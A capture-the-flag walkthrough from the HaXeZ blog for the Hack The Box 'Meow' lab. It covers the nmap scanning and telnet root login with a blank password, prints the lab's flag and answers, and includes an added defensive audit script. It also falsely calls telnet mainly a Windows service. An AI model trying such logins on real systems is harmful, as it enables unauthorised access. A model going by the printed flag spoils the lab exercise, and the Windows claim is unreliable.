Hack The Box: Machines – Meow

Dear Friend, welcome to HaXeZ, where today we’re looking at one of the Hack The Box Machines called Meow. This machine is part of the Tier 0 Starting Point boxes and is regarded as a very easy box. Additionally, there are a number of questions that you need to answer in order to complete this machine. First, we need to connect to the VPN. To do that, click on the Starting Point link and download the OpenVPN files.


Connect To The Hack The Box VPN

Once you have the files downloaded, put them in your virtual machine’s shared folder. If you don’t know where that is, please see my guide on creating a virtual machine shared folder. Once the file is in your shared folder, boot your virtual machine and log in. Next, either navigate to the mount point of your shared folder or put the full file path in the following command.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/VPN]
└─$ ls
starting_point_HaXeZ.ovpn                                                                                                                                                                                    
┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/VPN]
└─$ sudo openvpn starting_point_HaXeZ.ovpn
2022-04-29 08:28:32 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
---SNIP---
2022-04-29 08:41:55 Initialization Sequence Completed

You should have now successfully completed the first challenge.


Spawn The Machine

Further down the page you should see question two with an option to spawn the box. Click on the spawn the box link and it should do just that. Once the box has been spawned you should see an IP address. This is the address for the box that we will use to communicate with it.


You can now probably answer the next few questions too. The next one should be: what does the acronym VM stand for? The answer is Virtual Machine.


The next question is: what tool do we use to interact with the operating system in order to start our VPN connection? That will be the terminal.


After that, it asks: what is the abbreviated name for a tunnel interface in the output of your VPN boot-up sequence output? You can find this out by running ifconfig on your virtual machine. I’ve snipped out my eth0 and loopback address and some other information, but you can see that the abbreviated name is tun.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
inet 10.10.15.119  netmask 255.255.254.0  destination 10.10.15.119

Ping The Machine

Now that the box has been spawned and you know its address, it’s time to see whether we can talk to it. To do that, we’re going to use the ‘ping’ command.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo ping 10.129.122.207 | tee -a ping.txt
PING 10.129.122.207 (10.129.122.207) 56(84) bytes of data.
64 bytes from 10.129.122.207: icmp_seq=1 ttl=63 time=15.6 ms

This should now allow you to answer the next question, which is: what tool do we use to test our connection to the target? The answer is ping.


NMAP The Machine

Next we need to find out what services are available for us to talk to on the box. In order to do that we will use NMAP.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo nmap -sC -sV -p- 10.129.122.207 | tee -a nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-29 08:42 EDT
Nmap scan report for 10.129.122.207
Host is up (0.036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

You should now be able to answer the next question, which is: what is the name of the tool we use to scan the target’s ports? The answer is nmap.


Telnet To The Box

The results from the nmap scan showed us that port 23, or telnet, is open on the box. There were no other services listening, so we should attempt to connect to telnet to see what’s running. To do this, type the telnet command followed by the IP address and then the port, with a space between each.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo telnet 10.129.122.207 23
Trying 10.129.122.207...
Connected to 10.129.122.207.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: Administrator
Password: 
Login incorrect

After a bit of time waiting, we are greeted with an ASCII Hack The Box logo. This should allow you to answer the next question, which is: what service do we identify on port 23/tcp during our scans? The answer is telnet.


Login To The Box

We now need to log in to the box, but we don’t have any credentials. Telnet is predominantly a Windows service, so we can try logging in with Administrator or admin, but those don’t work. However, if we try logging in as root with a blank password, we are successfully authenticated.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo telnet 10.129.122.207 23
Trying 10.129.122.207...
Connected to 10.129.122.207.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: Administrator
Password: 
Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

After logging in we can see that the box is in fact Linux and running the Ubuntu operating system. We should now be able to answer the next question which is what username ultimately works with the remote management login prompt for the target. The answer is root.
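From the defender's side, the same finding can be audited for directly. The script below is an added example, not part of the original walkthrough: it assumes the blank password shows up as an empty hash field in a shadow(5)-format file, and the function names and sample shadow entries are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: audit for blank-password
# accounts reachable over telnet. File contents below are sample input.

# Names of accounts whose shadow(5) password field is empty, meaning no
# password is required. Locked accounts hold '!' or '*' and are skipped.
empty_password_accounts() {
    awk -F: '!/^#/ && NF >= 2 && $2 == "" { print $1 }' "$1" | paste -sd, -
}

# Ports that nmap's normal output lists as open telnet.
open_telnet_ports() {
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" && $3 == "telnet" { print $1 }' "$1" |
        paste -sd, -
}

# One verdict line from a shadow-format file ($1) and an nmap report ($2).
audit() {
    accounts=$(empty_password_accounts "$1")
    ports=$(open_telnet_ports "$2")
    if [ -n "$accounts" ] && [ -n "$ports" ]; then
        echo "CRITICAL: blank-password login for $accounts exposed on $ports"
    elif [ -n "$accounts" ]; then
        echo "HIGH: blank-password accounts: $accounts"
    elif [ -n "$ports" ]; then
        echo "MEDIUM: cleartext telnet exposed on $ports"
    else
        echo "OK"
    fi
}

tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT

# Constructed shadow entries: root has an empty password field.
cat > "$tmp/shadow" <<'EOF'
root::18900:0:99999:7:::
daemon:*:18900:0:99999:7:::
svc:!:18900:0:99999:7:::
alice:$6$constructedsalt$constructedhash:18900:0:99999:7:::
EOF

# Port table as shown in the scan output above.
cat > "$tmp/nmap.txt" <<'EOF'
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
EOF

audit "$tmp/shadow" "$tmp/nmap.txt"
```

On a real host, point the first argument of audit at /etc/shadow (root is required to read it) and the second at the nmap.txt saved earlier.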


Capture The Flag

Finally, we need to capture the flag. Fortunately they haven’t hidden it from us: we list the directory we are currently in and see the file. Then all we need to do is cat that file and submit the flag to the web page.

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~#

And that’s it, you should now have pwned Meow and can move on to the next box. Congratulations.
